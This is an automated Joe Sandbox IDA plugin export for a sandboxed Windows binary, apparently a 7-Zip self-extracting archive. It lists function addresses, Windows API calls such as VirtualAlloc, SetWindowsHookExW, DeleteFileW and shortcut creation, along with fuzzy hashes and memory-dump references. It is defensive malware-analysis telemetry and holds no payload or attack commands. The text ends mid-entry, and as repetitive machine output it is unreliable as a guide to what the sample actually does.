Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
Instruction ID: 10957c0686827aba29bf6b3fca61d148a92be0f7cf9b29a220708a815fa9a989
Opcode Fuzzy Hash: 34229f9fa32aa2f7fc41d1dd185fc7f07579dc1f5e874c2318e6b24567eda4a3
Instruction Fuzzy Hash: 96E0EC75200208FFDB01CF90CD41FDE7BBEEB49754F208058E9049A160C7759A10EB54

Function 004127AA Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004127AF

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
Instruction ID: 86de7528c5b8e745b9feb2f1f2e8827419998e537f7b53f3733c02d1bff58703
Opcode Fuzzy Hash: 138dc329791a6183fda8728fe879250bdc58d660df858f1861bde03158d924ef
Instruction Fuzzy Hash: 54D012B6A00108BBDB159F85E945BDEF778EB5135AF10402FB001A1540D7B85A519669

Function 0040CA73 Relevance: 1.5, APIs: 1, Instructions: 9timeCOMMON

Download Yara Rule

APIs

SetFileTime.KERNELBASE(?,?,?,?,0040CA9D,00000000,00000000,?,00401283,?), ref: 0040CA81

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: FileTime
String ID:
API String ID: 1425588814-0
Opcode ID: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
Instruction ID: de5aedd212665daa2fb0c30df7e581d57bf74256c4b77fd25e19f66411ac9bb8
Opcode Fuzzy Hash: 3ce96db92dac49fc9d73cad444b7c0058786613d71d531d4d45718336f5b86ac
Instruction Fuzzy Hash: 09C04C36158105FFCF020FB0CC04C5ABFA2AF99311F10C918B159C4070C7328024EB02

Function 0040CE83 Relevance: 1.3, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000060), ref: 0040CEFE

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
Instruction ID: cab80700ff2ef97e3e68849728e007b5961c94ff6a6edc9b3495ca6231c3d80c
Opcode Fuzzy Hash: 44ff9f97dd3702d7ca69990b92a65016c2b32a6d45cca806f690b46cab85baab
Instruction Fuzzy Hash: 23214A32604246DBCB34AF61D8D086BB3A6AF403557244A3FE442776D1C738AC479BDA

Function 004032D9 Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
Instruction ID: 04593239a52e0b24a0a84900efeb5de78bbbd7c33ac0e85a63675f9701e427e5
Opcode Fuzzy Hash: 5da00d81305d43432be94bf511d636d1c0af40f6c688cac88fa34fe88ae8ac90
Instruction Fuzzy Hash: 92D0223230422029DA64393A0907AFF4C8C8F90361F00487FB804EA2C1ED7CCE81228D

Function 0040C88E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
Instruction ID: 46fd5d44533f688af1cbb16b01e3684df0873ba17e3ffd79ac6e97726efa63b3
Opcode Fuzzy Hash: 260953eaa766690f6dd42752837e02fd8dd2a8d38b84a545f9bc6d2c9a71c262
Instruction Fuzzy Hash: 53D0123220456186DA782F7CB8C45C237D96E56331331476BF0B6D72E4D3788C835A98

Function 00402739 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040D8FF,?,?,?,004096BF,?), ref: 00402755

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
Instruction ID: ef3627dbe8ede4864a94ca482c41f1f7a661cdc9e7d225e9ae9e2bc502ca7986
Opcode Fuzzy Hash: 1d947fdf6df5f70e4621f0431d731520913ac8a11474ad35aa364c7fd2a883a0
Instruction Fuzzy Hash: D5C0803014430079ED1137608E07B4936526B80716F50C465F344540F0D7F544005509

Function 00401CFA Relevance: 1.3, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,0040D8A7,00000000,?,0040D8F6,?,?,004096BF,?), ref: 00401D0C

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
Instruction ID: 1004f56851fc8b889ccfe642d75eb19623be02efc3220bf612975ac128c53eb9
Opcode Fuzzy Hash: 6a62ac4a4d7dac27c13b63ea0cba825f676e2686878a6172cdbdd2a29a859d51
Instruction Fuzzy Hash: 7FB09230544700FEEF224B00DE09B8A76A0ABC0B05F30C528B188641F087B56804EA09

Non-executed Functions

Function 0040385E Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 290comCOMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 00403882
SHGetSpecialFolderPathW.SHELL32(00000000,?,DF20E863,00000000,00419828,00000000,0041981C), ref: 00403925
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00403996
??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 0040399E
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 004039A6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 004039AE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 004039B6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 004039BE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 004039C6
_wtol.MSVCRT ref: 00403A1C
CoCreateInstance.OLE32(00416E70,00000000,00000001,00416E30,00405712,.lnk,?,0000005C), ref: 00403ABD
??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 00403B55
??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 00403B5D
??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 00403B65
??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 00403B6D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 00403B75
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 00403B7D
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 00403B85
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 00403B8B
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 00403B93

Strings

.lnk, xrefs: 00403A9C

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
String ID: .lnk
API String ID: 408529070-24824748
Opcode ID: cf4a75b7d2df8ab8d94b29a73fb7e55b3673f3da2728c2876b416c30fcf727c8
Instruction ID: 6a4e2cb34307125d1aa254537a73282d765d300cba51a9a08192486ca10ed339
Opcode Fuzzy Hash: cf4a75b7d2df8ab8d94b29a73fb7e55b3673f3da2728c2876b416c30fcf727c8
Instruction Fuzzy Hash: 4DA18E71D10249ABDF14EFA1CC469EEBB78FF1430AF50442AF406B71A1DB389A42DB18

Function 00402187 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150stringCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
wsprintfW.USER32 ref: 004021E7
GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
GetLastError.KERNEL32 ref: 00402201
??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
GetLastError.KERNEL32 ref: 00402236
lstrcmpiW.KERNEL32(024B4890,00404926), ref: 0040224B
??3@YAXPAX@Z.MSVCRT(024B4890), ref: 0040225B
??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
SetLastError.KERNEL32(?), ref: 00402282
lstrlenA.KERNEL32(00416208), ref: 004022B6
??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
_wtol.MSVCRT ref: 00402314
MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,024B4890,00000002), ref: 00402334

Strings

7zSfxString%d, xrefs: 004021E1

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
String ID: 7zSfxString%d
API String ID: 2117570002-3906403175
Opcode ID: 21ae09bf32348a84b5a2f2e54b5b9e7d108aa2b47e227baa09689f935d6fe57e
Instruction ID: 10ef73f62a445f8617660be723e0bbad3c81975cf04d4be1a7303cf9b6c1a78d
Opcode Fuzzy Hash: 21ae09bf32348a84b5a2f2e54b5b9e7d108aa2b47e227baa09689f935d6fe57e
Instruction Fuzzy Hash: 82518171900604EFDB219FB5DD59BDABBB9EB48350B10807EE64EE62D0D774AD40CB28

Function 00401DC9 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
LockResource.KERNEL32(00000000), ref: 00401E2B
LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401E57
GetProcAddress.KERNEL32(00000000), ref: 00401E60
wsprintfW.USER32 ref: 00401E7F
LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401E94
GetProcAddress.KERNEL32(00000000), ref: 00401E97

Strings

%04X%c%04X%c, xrefs: 00401E79
SetThreadPreferredUILanguages, xrefs: 00401E8E
SetProcessPreferredUILanguages, xrefs: 00401E42
kernel32, xrefs: 00401E47, 00401E4C, 00401E93

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
API String ID: 2639302590-365843014
Opcode ID: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
Instruction ID: f9dda1162ec2f24eaafa78ee80fe21c3398d892f55d41869619f642ebc926886
Opcode Fuzzy Hash: 8e2c376142790921a1b7bbf09f4a30eccecb8d2c9c1f9a6d1badee13c63417f8
Instruction Fuzzy Hash: B5214C72900608FBDB119FA4DC08FDF3ABDEB84711F158426FA05A6291D7B89D40CBA8

Function 00408DBF Relevance: 16.6, APIs: 11, Instructions: 96stringwindowCOMMON

Download Yara Rule

APIs

wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
GetLastError.KERNEL32 ref: 00408DF4
FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
lstrlenW.KERNEL32(?), ref: 00408E44
lstrlenW.KERNEL32(?), ref: 00408E4B
??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
LocalFree.KERNEL32(?), ref: 00408E9A

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
String ID:
API String ID: 829399097-0
Opcode ID: 4faf531a358f257a6781f4b9a7a74002cf67e8eef782f1a4dd5a9a84c920668d
Instruction ID: c91527b0869a4d5de4249670dcf9d0912663d9707098e08fcc2f2580e19cfeee
Opcode Fuzzy Hash: 4faf531a358f257a6781f4b9a7a74002cf67e8eef782f1a4dd5a9a84c920668d
Instruction Fuzzy Hash: 41218176800208FFDB149FA0DD85DEB7BACEF44354B10807BF945A6190EF34AE858BA4

Function 00402EE6 Relevance: 16.6, APIs: 11, Instructions: 90filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,004155D0,?,?,?,00000000), ref: 00402F15
lstrcmpW.KERNEL32(?,004155CC,?,0000005C,?,?,?,00000000), ref: 00402F68
lstrcmpW.KERNEL32(?,004155C4,?,?,00000000), ref: 00402F7E
SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402F94
DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402F9B
FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402FAD
FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402FBC
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402FC7
RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402FD0
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FDB
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402FE6

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 1862581289-0
Opcode ID: b5d7478b488ab07fa35e0d914aff9eae8d9a73ce57448807aa14b1ac9d27a7f6
Instruction ID: e3ea1660441bcf3a3f7f20395b47020d8d3d19c9c96888f58badb5dcc8a6e628
Opcode Fuzzy Hash: b5d7478b488ab07fa35e0d914aff9eae8d9a73ce57448807aa14b1ac9d27a7f6
Instruction Fuzzy Hash: 7A218631A04209FBDB11AB71DD8DFEF3B7CAF44745F50407AB805B21D0EBB89A459A68

Function 00408630 Relevance: 7.5, APIs: 5, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0040864F
SetWindowsHookExW.USER32(00000007,Function_00008576,00000000,00000000), ref: 0040865A
GetCurrentThreadId.KERNEL32 ref: 00408669
SetWindowsHookExW.USER32(00000002,Function_00008602,00000000,00000000), ref: 00408674
EndDialog.USER32(?,00000000), ref: 0040869A

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: CurrentHookThreadWindows$Dialog
String ID:
API String ID: 1967849563-0
Opcode ID: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
Instruction ID: a1df587bc44f7b8848174d41fcc6ca6bf5c09d6170abc4bd78dad765c28a629c
Opcode Fuzzy Hash: 3c307380277fa9ea080ffec5c86f5ec4071e690be1bfbef556a541cbc554ab57
Instruction Fuzzy Hash: 93012671600218DFD3106B7AED44AB3F7ECEB85755B12843FE202921A0CAB79C008F6C

Function 0040244E Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(00406032,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0000000A,-00000008,00406032,?,00000000,0000000A), ref: 00402487
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00402499
FreeSid.ADVAPI32(?), ref: 004024A2

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
Instruction ID: fcbafef67fd355d70295d2c1b6ce6e7585022550186800af39a78ba60eef4ec0
Opcode Fuzzy Hash: 61f8cf9d4fe0a411273f6da1a0187a3308019e8c7258d9cc8422d2cdfcfadd87
Instruction Fuzzy Hash: F7F03C72944288FEDB01DBE88D85ADEBF7CAB18304F8480AAA101A2182D2705704CB69

Function 0040AD30 Relevance: .5, Instructions: 479COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
Instruction ID: 1deff6650f640bb2d9dcab77f147087c60d03763b1f3dd6742a57df9d51469cf
Opcode Fuzzy Hash: b1df083afa2ec122568cef5a0170ccce4311ab5785baa6c9343831b33b0cc2ec
Instruction Fuzzy Hash: 5F022B72A043124BDB09CE28C59027DBBE2FBC4345F150A3EE89667BC4D7789954C7DA

Function 00413D43 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
Instruction ID: d276be45ba9710969d4d69a2fbd68599cb80de3b2bdcae4a446b37c04d3c8c9c
Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
Instruction Fuzzy Hash: 6A41C360C14B9652EB134F7CC842272B320BFAB244F00D75AFDD179922FB3266446255

Function 00413370 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
Instruction ID: 6fc8e050a97d926f750d5da14c4a761a5f22703977f0277d1b92a118b0bcd8c9
Opcode Fuzzy Hash: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
Instruction Fuzzy Hash: 2F212E7B370D4607EB0C8939AE336BE2582E340346F88953DD247C5784EE9E9954810D

Function 004139D1 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3448635382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3448594889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448686855.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448735041.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3448791636.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
